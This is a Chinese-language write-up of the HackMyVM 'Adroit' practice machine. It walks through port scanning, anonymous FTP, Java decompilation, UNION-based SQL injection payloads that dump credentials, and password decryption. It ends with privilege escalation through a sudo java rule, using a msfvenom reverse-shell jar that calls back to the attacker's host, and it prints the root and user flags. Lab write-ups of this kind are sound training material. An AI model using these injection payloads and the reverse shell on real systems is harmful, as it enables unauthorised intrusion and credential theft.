【hackmyvm】Adroit靶机wp

tags:

HMV
java反编译
SQL注入

1. 基本信息^toc

文章目录

- 1. 基本信息^toc
- 2. 信息收集
- 3. java反编译
- 4. sql注入
- 5. 解密密码
- 6. 提权

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Adroit
作者 alienum
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

┌──(root㉿kali)-[~]
└─# fscan -h 192.168.80.11___                              _/ _ \     ___  ___ _ __ __ _  ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\fscan version: 1.8.4
start infoscan
192.168.80.11:3306 open
192.168.80.11:3000 open
192.168.80.11:21 open
192.168.80.11:22 open
[*] alive ports len is: 4
start vulscan
[+] ftp 192.168.80.11:21:anonymous[->]pub

ftp

ftp> ls -a
229 Entering Extended Passive Mode (|||40570|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 19  2021 .
drwxr-xr-x    3 ftp      ftp          4096 Jan 14  2021 ..
-rw-r--r--    1 ftp      ftp          5451 Jan 14  2021 adroitclient.jar
-rw-r--r--    1 ftp      ftp           229 Mar 19  2021 note.txt
-rw-r--r--    1 ftp      ftp         36430 Jan 14  2021 structure.PNG

structrue.png
Pasted image 20241203164149

3. java反编译

Pasted image 20241203164747
获取到secret Sup3rS3cur3Dr0it
Pasted image 20241203165012
域名 adroit.local
Pasted image 20241203165048
用户名 zeus 域名 god.thunder.olympus

添加一个域名 adroit.local

尝试运行一下jar包

这里我用jdk8运行不了，切换到jdk11可以运行

提示输入账户密码挨个测试即可

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
Sup3rS3cur3Dr0it
Wrong username or password   ┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1

god.thunder.olympus 就是密码

4. sql注入

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :1 union select 1,database() -- -
--> adroit1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema ='adroit' -- -
-->  ideas,users1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- -
--> 
id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS1 union select 1,group_concat(username,0x3a,password) from users -- -
--> writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=

获取到了账户密码 writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=
但是密码是加密的

但是加密的

5. 解密密码

解密的代码可以在jar包反编译中发现
Pasted image 20241203172527
密钥上面获取到了是 Sup3rS3cur3Dr0it
但是注意这里需要将0换成O
所以正确的密钥是 Sup3rS3cur3DrOit

参考 Mikannse的wp对这个进行解密

获取到密码是 just.write.my.ideas

6. 提权

利用账户密码登录

writer ： just.write.my.ideas
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# ssh writer@192.168.80.11
writer@192.168.80.11''s password:
Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15
writer@adroit:~$ id
uid=1000(writer) gid=1000(writer) groups=1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
writer@adroit:~$ whoami
writer

writer@adroit:~$ sudo -l
[sudo] password for writer:
Matching Defaults entries for writer on adroit:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser writer may run the following commands on adroit:(root) /usr/bin/java -jar /tmp/testingmyapp.jar

msf生成jar包反弹shell

msfvenom -p java/shell_reverse_tcp lhost=192.168.80.5 lport=4444 -f jar -o reverse.jarwriter@adroit:/tmp$ cp reverse.jar  /tmp/testingmyapp.jar
writer@adroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar[17:54:28] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:56:16] received connection from 192.168.80.11:51550                                                     bind.py:84
[17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                  manager.py:957192.168.80.11:51550: registered new host w/ db                                               manager.py:957
(local) pwncat$
(remote) root@adroit:/tmp# whoami
root
(remote) root@adroit:/root# ls
root.txt
(remote) root@adroit:/root# cat root.txt
017a030885f25af277dd891d0f151845
(remote) root@adroit:/root# cd /home/writer/
(remote) root@adroit:/home/writer# cat user.txt
61de3a25161dcb2b88b5119457690c3c
(remote) root@adroit:/home/writer#